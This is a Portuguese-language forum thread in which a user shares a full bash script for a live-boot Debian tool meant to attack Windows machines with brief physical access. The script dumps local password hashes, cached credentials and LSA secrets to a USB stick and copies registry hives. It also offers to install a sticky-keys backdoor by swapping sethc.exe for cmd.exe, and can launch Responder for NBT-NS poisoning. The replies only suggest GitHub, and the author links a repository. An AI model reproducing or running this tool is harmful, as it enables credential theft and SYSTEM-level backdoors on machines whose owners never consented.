Jump to content
MateusP

Script automação pentests em redes windows.

Recommended Posts

Estou terminando de desenvolver uma ferramenta para automatizar uma parte do pentest em redes Windows pressupondo acesso físico a uma máquina por 30s e ausência de full disk encryption.

A tool é uma modificação do Debian 9 com live boot bastante silencioso e o rc.local executando o script abaixo.

Gostaria muito de críticas construtivas tanto quanto ao shell script em si quanto a funcionalidades desejáveis! =)

A tool será disponibilizada usando a licença GNU/GPLv2

#!/bin/bash
#A opção -p no read não estava funcionando e eu não tinha paciência para descobrir o motivo
exec > /dev/tty1
exec < /dev/tty1
clear
cat /spectre/banner
echo " -----------------------------------"
echo "| Scarlet Spectre Started!          |"
echo " -----------------------------------"
echo "Seeking and mounting NTFS partitions"
mkdir /hds/ -p
mkdir -p /hds/pendrive
mount -t vfat -o rw,force  $(blkid | grep -i "Scarlet" | cut -d':' -f1) /hds/pendrive
for device in $(blkid | grep -i "NTFS" | cut -d':' -f1) ; do 
	mounted="/hds/"$(basename $device)
	mkdir -p $mounted
	mount -t ntfs-3g -o rw,force $device $mounted
	if [ -d $mounted/Windows ]; then
	       	echo "Found Windows installed on $device!"
		system32=$mounted/Windows/System32
		python /spectre/creddump7/pwdump.py $system32/config/SYSTEM $system32/config/SAM true | tee -a /hds/pendrive/credentials.log
		python /spectre/creddump7/cachedump.py $system32/config/SYSTEM $system32/config/SECURITY true | tee -a /hds/pendrive/credentials.log
		python /spectre/creddump7/lsadump.py $system32/config/SYSTEM $system32/config/SECURITY true | tee -a /hds/pendrive/credentials.log
		echo "Copying registry hives..."
		mkdir -p /hds/pendrive/hives
		cp $system32/config/{SYSTEM,SECURITY,SAM,SOFTWARE} /hds/pendrive/hives/
		echo "Do you want to replace sethc.exe with cmd.exe (press shift 5x on logon screen for a prompt as System)? y/N: "
		read -n 1 -s -r temp
		if [ "$temp" == "y"  ] || [ "$temp" == "Y"  ]; then
			echo -e "\nReplacing sethc.exe..."
			cp $system32/sethc.exe $system32/sethc_.exe
			cp $system32/cmd.exe $system32/sethc.exe
		fi
	fi
done
echo "Do you want to start an NBT-DS poisoning attack? (y/N)"
read -n 1 -s -r temp
if [ "$temp" == "y"  ] || [ "$temp" == "Y"  ]; then
	echo "Available interfaces:"
	option=0
	interfaces=()
	for interface in /sys/class/net/*; do 
		interface="$(basename $interface)"
		interfaces+=($interface)
		echo "$option - $interface"
		let "option+=1"
	done
	echo "Enter the number of the network interface you want to configure: "
	read -n 1 -s -r selected
	echo "Trying to setup ${interfaces[$selected]} using DHCP..."
	dhclient ${interfaces[$selected]}
	if [ -e "/var/lib/dhcp/dhclient.leases" ] && [ "$( cat /var/lib/dhcp/dhclient.leases | grep ${interfaces[$selected]} )" != ""  ]; then 
		python /spectre/Responder/Responder.py -I ${interfaces[$selected]}	
	else
		echo "Unable to setup networking using DHCP, do you want to try to read network setup data from Windows Registry? (y/N): " 
		read -n 1 -s -r option
		if [ "$option" == "Y" ] || [ "$option" == "y"  ]; then 
			echo -e "\nDoing windows registry stuff";  #todo
		fi
	fi
fi

echo "Scarlet Spectre successfully deployed!"
echo "Press R to reboot or anything for a Debian shell" 
read -n 1 -s -r tmp
if [ "$tmp" == "r" ] ; then
	reboot
fi
clear
exit 0

 

Edited by MateusP
  • Curtir 1

Share this post


Link to post
Share on other sites

Primeira dica construtiva =]. Já pensou em usar github ? Fica até mais fácil de receber/fazer outras dicas construtivas.

valeu =]

  • Curtir 1
  • Haha 1

Share this post


Link to post
Share on other sites
Em 02/02/2018 em 10:59, ncaio disse:

Primeira dica construtiva =]. Já pensou em usar github ? Fica até mais fácil de receber/fazer outras dicas construtivas.

valeu =]

Pronto...agora tá no GiitHub e com direito à script para construir a imagem do 0!

Só testei a partir de uma VM Debian 9,by the way.... logo mais disponibilizo também a iso pronta...

https://github.com/ScarletTeam/scarlet-spectre/

Edited by MateusP
  • Curtir 3

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...